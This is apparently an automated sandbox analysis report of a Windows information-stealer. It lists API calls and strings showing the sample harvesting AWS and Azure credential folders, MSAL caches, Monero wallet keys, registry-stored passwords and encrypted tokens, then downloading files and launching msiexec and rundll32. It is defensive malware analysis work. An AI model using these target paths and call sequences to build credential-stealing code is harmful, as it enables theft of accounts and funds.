                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                    • String ID: - $%s\%s$?
                    • API String ID: 3246050789-3278919252
                    • Opcode ID: 37474cb59c04230c869e177ddb732a9899ba30e562d32cb8e61947892a3bdbfa
                    • Instruction ID: 14bd2cc04e77d0c6836271b3606689e176899d5232f9c6f1af566b15404b8a51
                    • Opcode Fuzzy Hash: 37474cb59c04230c869e177ddb732a9899ba30e562d32cb8e61947892a3bdbfa
                    • Instruction Fuzzy Hash: 1A811EB1910118ABEB24EB50CC91FEE77B9FF08704F4086DAE109A6140DF796B85CFA5
                    APIs
                      • Part of subcall function 00488DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00484DB0
                    • lstrcat.KERNEL32(?,\.azure\), ref: 00484DCD
                      • Part of subcall function 00484910: wsprintfA.USER32 ref: 0048492C
                      • Part of subcall function 00484910: FindFirstFileA.KERNEL32(?,?), ref: 00484943
                    • lstrcat.KERNEL32(?,00000000), ref: 00484E3C
                    • lstrcat.KERNEL32(?,\.aws\), ref: 00484E59
                      • Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,00490FDC), ref: 00484971
                      • Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,00490FE0), ref: 00484987
                      • Part of subcall function 00484910: FindNextFileA.KERNEL32(000000FF,?), ref: 00484B7D
                      • Part of subcall function 00484910: FindClose.KERNEL32(000000FF), ref: 00484B92
                    • lstrcat.KERNEL32(?,00000000), ref: 00484EC8
                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00484EE5
                      • Part of subcall function 00484910: wsprintfA.USER32 ref: 004849B0
                      • Part of subcall function 00484910: StrCmpCA.SHLWAPI(?,004908D2), ref: 004849C5
                      • Part of subcall function 00484910: wsprintfA.USER32 ref: 004849E2
                      • Part of subcall function 00484910: PathMatchSpecA.SHLWAPI(?,?), ref: 00484A1E
                      • Part of subcall function 00484910: lstrcat.KERNEL32(?,0123E758), ref: 00484A4A
                      • Part of subcall function 00484910: lstrcat.KERNEL32(?,00490FF8), ref: 00484A5C
                      • Part of subcall function 00484910: lstrcat.KERNEL32(?,?), ref: 00484A70
                      • Part of subcall function 00484910: lstrcat.KERNEL32(?,00490FFC), ref: 00484A82
                      • Part of subcall function 00484910: lstrcat.KERNEL32(?,?), ref: 00484A96
                      • Part of subcall function 00484910: CopyFileA.KERNEL32(?,?,00000001), ref: 00484AAC
                      • Part of subcall function 00484910: DeleteFileA.KERNEL32(?), ref: 00484B31
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                    • API String ID: 949356159-974132213
                    • Opcode ID: 7035b97e70c409ac4ea80df5c5edf5cb985b86d98c3ec131f575995ea4fb75d5
                    • Instruction ID: fae10b047aa6e019273639bd35fe93c8ed3a74a4d1139226f5eadfebadd65bda
                    • Opcode Fuzzy Hash: 7035b97e70c409ac4ea80df5c5edf5cb985b86d98c3ec131f575995ea4fb75d5
                    • Instruction Fuzzy Hash: B441A4B9A4020466DB14F760EC47FED3638AB64704F00499AB149664C1FEFD5BC98B96
                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0048906C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateGlobalStream
                    • String ID: image/jpeg
                    • API String ID: 2244384528-3785015651
                    • Opcode ID: b5383eff8e399f357df9f3ad0ff2303d067bde93fda2beb21b8564e820eb7ffd
                    • Instruction ID: e8b8174d5854b946799761b5b1543a04bee3eb421270c405a1fad11c2a21c3b1
                    • Opcode Fuzzy Hash: b5383eff8e399f357df9f3ad0ff2303d067bde93fda2beb21b8564e820eb7ffd
                    • Instruction Fuzzy Hash: 847110B5910208AFDB04EFE4DC89FEEB7B9BF48300F148619F515A7290DB38A945CB65
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • ShellExecuteEx.SHELL32(0000003C), ref: 004831C5
                    • ShellExecuteEx.SHELL32(0000003C), ref: 0048335D
                    • ShellExecuteEx.SHELL32(0000003C), ref: 004834EA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell$lstrcpy
                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                    • API String ID: 2507796910-3625054190
                    • Opcode ID: 103207045ac33aa0ac10e9f0ad1a7b152faa0cbd8d7c49280ca70c8911f63b8e
                    • Instruction ID: c69f48aa7c373b186fcf8b67230963c7b8886ced6050d97153745d908a6f738e
                    • Opcode Fuzzy Hash: 103207045ac33aa0ac10e9f0ad1a7b152faa0cbd8d7c49280ca70c8911f63b8e
                    • Instruction Fuzzy Hash: 8B121E718001089AEB15FBA1CC92FDDB778AF14304F50495FE50666191EFBC2B9ACB6A
                    APIs
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 00476280: InternetOpenA.WININET(00490DFE,00000001,00000000,00000000,00000000), ref: 004762E1
                      • Part of subcall function 00476280: StrCmpCA.SHLWAPI(?,0123E858), ref: 00476303
                      • Part of subcall function 00476280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00476335
                      • Part of subcall function 00476280: HttpOpenRequestA.WININET(00000000,GET,?,0123E298,00000000,00000000,00400100,00000000), ref: 00476385
                      • Part of subcall function 00476280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004763BF
                      • Part of subcall function 00476280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004763D1
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00485318
                    • lstrlen.KERNEL32(00000000), ref: 0048532F
                      • Part of subcall function 00488E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00488E52
                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00485364
                    • lstrlen.KERNEL32(00000000), ref: 00485383
                    • lstrlen.KERNEL32(00000000), ref: 004853AE
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 3240024479-1526165396
                    • Opcode ID: f0588014511e6c18cdaf3ad0d6b6316384da649a5ee87cd53537b7d720a72510
                    • Instruction ID: 6b015892b98b068dbfc9455735fa27259d57fd5272d7880ecf4fba40e257bac2
                    • Opcode Fuzzy Hash: f0588014511e6c18cdaf3ad0d6b6316384da649a5ee87cd53537b7d720a72510
                    • Instruction Fuzzy Hash: 52514F70910108ABEB18FF65C992AED3779AF10304F50482FF40A56591EF7C6B56CB7A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen
                    • String ID:
                    • API String ID: 2001356338-0
                    • Opcode ID: bbc92471cd2d83712ee47261bf0cfef1e450ef92d602ee95126b726bd47e2d10
                    • Instruction ID: 61ccf89482e4590b8d32774e154dbdece4ef439bcb17c6dc593c0ff62a87cea5
                    • Opcode Fuzzy Hash: bbc92471cd2d83712ee47261bf0cfef1e450ef92d602ee95126b726bd47e2d10
                    • Instruction Fuzzy Hash: 74C1A5B59001099BCB14FF60DC89FEE7379BB54308F0049DEE50AA7251DB78AA85CFA5
                    APIs
                      • Part of subcall function 00488DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 004842EC
                    • lstrcat.KERNEL32(?,0123E370), ref: 0048430B
                    • lstrcat.KERNEL32(?,?), ref: 0048431F
                    • lstrcat.KERNEL32(?,0123D540), ref: 00484333
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 00488D90: GetFileAttributesA.KERNEL32(00000000,?,00471B54,?,?,0049564C,?,?,00490E1F), ref: 00488D9F
                      • Part of subcall function 00479CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00479D39
                      • Part of subcall function 004799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
                      • Part of subcall function 004799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
                      • Part of subcall function 004799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
                      • Part of subcall function 004799C0: ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
                      • Part of subcall function 004799C0: LocalFree.KERNEL32(0047148F), ref: 00479A90
                      • Part of subcall function 004799C0: CloseHandle.KERNEL32(000000FF), ref: 00479A9A
                      • Part of subcall function 004893C0: GlobalAlloc.KERNEL32(00000000,004843DD,004843DD), ref: 004893D3
                    • StrStrA.SHLWAPI(?,0123E1A8), ref: 004843F3
                    • GlobalFree.KERNEL32(?), ref: 00484512
                      • Part of subcall function 00479AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479AEF
                      • Part of subcall function 00479AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00474EEE,00000000,?), ref: 00479B01
                      • Part of subcall function 00479AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NG,00000000,00000000), ref: 00479B2A
                      • Part of subcall function 00479AC0: LocalFree.KERNEL32(?,?,?,?,00474EEE,00000000,?), ref: 00479B3F
                    • lstrcat.KERNEL32(?,00000000), ref: 004844A3
                    • StrCmpCA.SHLWAPI(?,004908D1), ref: 004844C0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 004844D2
                    • lstrcat.KERNEL32(00000000,?), ref: 004844E5
                    • lstrcat.KERNEL32(00000000,00490FB8), ref: 004844F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                    • String ID:
                    • API String ID: 3541710228-0
                    • Opcode ID: 7a5953508e02b78d397add2c8500f231c2078275f6bed257bbb8173ba3a88466
                    • Instruction ID: c98bd3cef1e73dee769da88a6da527ce789746f99b8a59178426190f283d9d67
                    • Opcode Fuzzy Hash: 7a5953508e02b78d397add2c8500f231c2078275f6bed257bbb8173ba3a88466
                    • Instruction Fuzzy Hash: 547157B6900208BBDB14FBE0DC85FEE7379AB88304F04459DF60997181EA78DB55CB95
                    APIs
                      • Part of subcall function 004712A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004712B4
                      • Part of subcall function 004712A0: RtlAllocateHeap.NTDLL(00000000), ref: 004712BB
                      • Part of subcall function 004712A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004712D7
                      • Part of subcall function 004712A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004712F5
                      • Part of subcall function 004712A0: RegCloseKey.ADVAPI32(?), ref: 004712FF
                    • lstrcat.KERNEL32(?,00000000), ref: 0047134F
                    • lstrlen.KERNEL32(?), ref: 0047135C
                    • lstrcat.KERNEL32(?,.keys), ref: 00471377
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 00488B60: GetSystemTime.KERNEL32(00490E1A,0123A250,004905AE,?,?,004713F9,?,0000001A,00490E1A,00000000,?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 00488B86
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00471465
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 004799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
                      • Part of subcall function 004799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
                      • Part of subcall function 004799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
                      • Part of subcall function 004799C0: ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
                      • Part of subcall function 004799C0: LocalFree.KERNEL32(0047148F), ref: 00479A90
                      • Part of subcall function 004799C0: CloseHandle.KERNEL32(000000FF), ref: 00479A9A
                    • DeleteFileA.KERNEL32(00000000), ref: 004714EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                    • API String ID: 3478931302-218353709
                    • Opcode ID: 96ed77dd4ac376a0937a21fbdec1faf1453364f7e35a15196d0cfe74638244be
                    • Instruction ID: e79b2ac46bd339641254e03a6fa1001e5f3129794780f40cc0ea9089a2c0def1
                    • Opcode Fuzzy Hash: 96ed77dd4ac376a0937a21fbdec1faf1453364f7e35a15196d0cfe74638244be
                    • Instruction Fuzzy Hash: 925164B1D101185BDB15FB61DC92FED733CAF50304F4045EEB60A62091EE786B99CBAA
                    APIs
                      • Part of subcall function 004772D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0047733A
                      • Part of subcall function 004772D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004773B1
                      • Part of subcall function 004772D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0047740D
                      • Part of subcall function 004772D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00477452
                      • Part of subcall function 004772D0: HeapFree.KERNEL32(00000000), ref: 00477459
                    • lstrcat.KERNEL32(00000000,004917FC), ref: 00477606
                    • lstrcat.KERNEL32(00000000,00000000), ref: 00477648
                    • lstrcat.KERNEL32(00000000, : ), ref: 0047765A
                    • lstrcat.KERNEL32(00000000,00000000), ref: 0047768F
                    • lstrcat.KERNEL32(00000000,00491804), ref: 004776A0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 004776D3
                    • lstrcat.KERNEL32(00000000,00491808), ref: 004776ED
                    • task.LIBCPMTD ref: 004776FB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                    • String ID: :
                    • API String ID: 2677904052-3653984579
                    • Opcode ID: 04b62ced232289f04cca77523f37400c4989add7f2fdd49d1381d2ed3d5b94c6
                    • Instruction ID: 5680078f2224a3743f068bcf2819f254980c1f52b4a48c731e4245cdc856c424
                    • Opcode Fuzzy Hash: 04b62ced232289f04cca77523f37400c4989add7f2fdd49d1381d2ed3d5b94c6
                    • Instruction Fuzzy Hash: CF315EB1A00109EBCB04EBF5DC89DFE7775FB44305B54821EF106A7290DA38A986CB66
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0123E0D0,00000000,?,00490E2C,00000000,?,00000000), ref: 00488130
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00488137
                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00488158
                    • __aulldiv.LIBCMT ref: 00488172
                    • __aulldiv.LIBCMT ref: 00488180
                    • wsprintfA.USER32 ref: 004881AC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                    • String ID: %d MB$@
                    • API String ID: 2774356765-3474575989
                    • Opcode ID: 779df993f302427ae03cc170133cc9b82ffb5e282ddfba718a1299b277dbd140
                    • Instruction ID: b81a6bfe40f840e137cd4e492939b32e56726a56752d4d6336444b2d59a99e95
                    • Opcode Fuzzy Hash: 779df993f302427ae03cc170133cc9b82ffb5e282ddfba718a1299b277dbd140
                    • Instruction Fuzzy Hash: E7210EF1E44218ABDB04EFD5CC49FAEB779FB44714F204619F605BB280D77869018BA9
                    APIs
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 004747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00474839
                      • Part of subcall function 004747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00474849
                    • InternetOpenA.WININET(00490DF7,00000001,00000000,00000000,00000000), ref: 0047610F
                    • StrCmpCA.SHLWAPI(?,0123E858), ref: 00476147
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0047618F
                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004761B3
                    • InternetReadFile.WININET(?,?,00000400,?), ref: 004761DC
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0047620A
                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00476249
                    • InternetCloseHandle.WININET(?), ref: 00476253
                    • InternetCloseHandle.WININET(00000000), ref: 00476260
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                    • String ID:
                    • API String ID: 2507841554-0
                    • Opcode ID: 2e95b90e384e243b5cff099324eed2254a06ee4eb91abeedd2d9ddf0155028a6
                    • Instruction ID: be20a424b778eaed9707d2aa953f943c8a53edc4e737eac2906fbf4d95028fb5
                    • Opcode Fuzzy Hash: 2e95b90e384e243b5cff099324eed2254a06ee4eb91abeedd2d9ddf0155028a6
                    • Instruction Fuzzy Hash: 345196B0900208AFDB10EF91CC49BEE7779EB04305F10859AF609A71C1DBB86A85CF5A
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0047733A
                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004773B1
                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0047740D
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00477452
                    • HeapFree.KERNEL32(00000000), ref: 00477459
                    • task.LIBCPMTD ref: 00477555
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID: Heap$EnumFreeOpenProcessValuetask
                    • String ID: Password
                    • API String ID: 775622407-3434357891
                    • Opcode ID: 0c57d87fc465b842dfa4d7898a96d522fb10d5315194d9cbcc621849a2531581
                    • Instruction ID: dbe5aff23e83898a50f6197ea4e26f651b5c451e8b2c49ecdba4f5a5383348bf
                    • Opcode Fuzzy Hash: 0c57d87fc465b842dfa4d7898a96d522fb10d5315194d9cbcc621849a2531581
                    • Instruction Fuzzy Hash: 45615AB58441689BDB24DB50CC45BDAB7B8BF44304F00C1EAE64DA6241DBB45FC9CFA5
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                    • lstrlen.KERNEL32(00000000), ref: 0047BC9F
                      • Part of subcall function 00488E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00488E52
                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0047BCCD
                    • lstrlen.KERNEL32(00000000), ref: 0047BDA5
                    • lstrlen.KERNEL32(00000000), ref: 0047BDB9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                    • API String ID: 3073930149-1079375795
                    • Opcode ID: ead67ac665bb2a6ad27dae0bacb3e5115dee6693a7bbe285dad3976171df4033
                    • Instruction ID: bf1916f3188128aa584078abd54bd5d727d6260dbce07087cc702724ecad300f
                    • Opcode Fuzzy Hash: ead67ac665bb2a6ad27dae0bacb3e5115dee6693a7bbe285dad3976171df4033
                    • Instruction Fuzzy Hash: E3B164B19101049BEB04FBA1CC96EEE7339AF14304F50496FF50662191EF7C6A59CBBA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess$DefaultLangUser
                    • String ID: *
                    • API String ID: 1494266314-163128923
                    • Opcode ID: 8f5910ae322d992617e449d3d4ea6967f6952df243d3920ff64f31f15f1e7ec4
                    • Instruction ID: 91f6988b59c1b924a161d96389ba3626df4b964ed1263351ccbb517cee3ec545
                    • Opcode Fuzzy Hash: 8f5910ae322d992617e449d3d4ea6967f6952df243d3920ff64f31f15f1e7ec4
                    • Instruction Fuzzy Hash: 3AF05E74908249FFE384AFE0E90972C7B71FB04703F0402ADF60986290DA764B919BD6
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00474FCA
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00474FD1
                    • InternetOpenA.WININET(00490DDF,00000000,00000000,00000000,00000000), ref: 00474FEA
                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00475011
                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00475041
                    • InternetCloseHandle.WININET(?), ref: 004750B9
                    • InternetCloseHandle.WININET(?), ref: 004750C6
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                    • String ID:
                    • API String ID: 3066467675-0
                    • Opcode ID: cbebec856c6ac5910dbd3ff9b71651d0695859041450f3900cddc68b69c2c9cf
                    • Instruction ID: 893dffae372fd35bb64f4ac6a07337d94abbb8ea5ad644568fc4406c5370838e
                    • Opcode Fuzzy Hash: cbebec856c6ac5910dbd3ff9b71651d0695859041450f3900cddc68b69c2c9cf
                    • Instruction Fuzzy Hash: D5310CF4A00218ABDB20DF54DC85BDDB7B5EB48704F1081D9E709A7280DBB46AC58F99
                    APIs
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00488426
                    • wsprintfA.USER32 ref: 00488459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0048847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 0048848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00488499
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                    • RegQueryValueExA.ADVAPI32(00000000,0123DF08,00000000,000F003F,?,00000400), ref: 004884EC
                    • lstrlen.KERNEL32(?), ref: 00488501
                    • RegQueryValueExA.ADVAPI32(00000000,0123DE48,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00490B34), ref: 00488599
                    • RegCloseKey.ADVAPI32(00000000), ref: 00488608
                    • RegCloseKey.ADVAPI32(00000000), ref: 0048861A
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                    • String ID: %s\%s
                    • API String ID: 3896182533-4073750446
                    • Opcode ID: 1d52065d468d222c957083567478b59cd4314c2bfaceac6b4d103622a158270a
                    • Instruction ID: 6d1365e725eee16cb296ad9eb85e26d83ed815e76535cda21552f88502ac1d58
                    • Opcode Fuzzy Hash: 1d52065d468d222c957083567478b59cd4314c2bfaceac6b4d103622a158270a
                    • Instruction Fuzzy Hash: 49210AB1900218ABDB24DB54DC85FE9B3B9FB48700F40C699E609A6140DF75AAC5CFE4
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004876A4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 004876AB
                    • RegOpenKeyExA.ADVAPI32(80000002,0122C508,00000000,00020119,00000000), ref: 004876DD
                    • RegQueryValueExA.ADVAPI32(00000000,0123DF98,00000000,00000000,?,000000FF), ref: 004876FE
                    • RegCloseKey.ADVAPI32(00000000), ref: 00487708
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: Windows 11
                    • API String ID: 3225020163-2517555085
                    • Opcode ID: 442ed9b9e9e67b0b570d7976dffb15ac1a32fa098341c7335b30754d16b6c4ac
                    • Instruction ID: d2e7bce008f2e405159aa3bde3488c491959fb1cdaa35e5bb475f6e284342a14
                    • Opcode Fuzzy Hash: 442ed9b9e9e67b0b570d7976dffb15ac1a32fa098341c7335b30754d16b6c4ac
                    • Instruction Fuzzy Hash: D101A2F8A04304BFDB00EBE0DD59F6EB7B9EB48700F104655FA05D7291EA74A980CB55
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487734
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0048773B
                    • RegOpenKeyExA.ADVAPI32(80000002,0122C508,00000000,00020119,004876B9), ref: 0048775B
                    • RegQueryValueExA.ADVAPI32(004876B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0048777A
                    • RegCloseKey.ADVAPI32(004876B9), ref: 00487784
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: CurrentBuildNumber
                    • API String ID: 3225020163-1022791448
                    • Opcode ID: c4a599c38dcaeef2a59b3c79f24eec2f0fb8db02b6db598fbac6f117439dcbc0
